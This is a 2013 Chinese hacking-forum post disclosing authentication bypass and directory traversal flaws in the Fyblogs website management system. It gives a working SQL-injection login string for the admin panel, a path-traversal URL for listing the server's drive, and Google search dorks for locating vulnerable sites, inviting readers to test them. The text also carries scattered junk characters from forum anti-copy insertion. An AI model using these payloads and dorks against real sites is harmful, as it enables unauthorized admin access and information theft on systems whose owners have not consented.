找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1846|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-7 13:07:46 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: 未授权访问/权限绕过
$ r+ ]5 @2 }3 y; q1 F' {+ {' b" x+ p
简要描述:/ w+ B; F3 k( A

4 p; w$ L7 R9 k, p9 vFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!4 @0 Y0 l8 y$ w8 q; _9 ]: ~

, C. s- P9 G8 Y8 Q1 f详细说明:
1 V5 j  h/ p# I: U" d. h) {  L" a' Q
后台万能密码 'or'='or'
/ h! {" L# |9 C8 P  N后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!0 h7 E2 }! k7 \# Q% j+ G: V. u2 ]) `
admin/uploadfile.asp?currentFolder=/upfiles/../- ]- K, m, A' K0 ?4 v

6 i/ {7 h' Y) ?漏洞证明:9 X3 D/ k, U+ r, F" z) q
; W) ]4 O5 r# t4 E- G  A) u
谷歌:inurl:type.asp?id=1 新闻中心
* f6 e+ J' B& Q# m- `/ w0 B或者 :inurl:download_ok.asp?$ l- F0 n2 q* B3 @+ w, G* u
# B' T' Y( V2 Q  T1 ]
可以测试
& I) ]. [& ^0 q/ f* a! v
5 D$ v  A6 K: U  X
0 E6 A* U; {6 j( O; i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表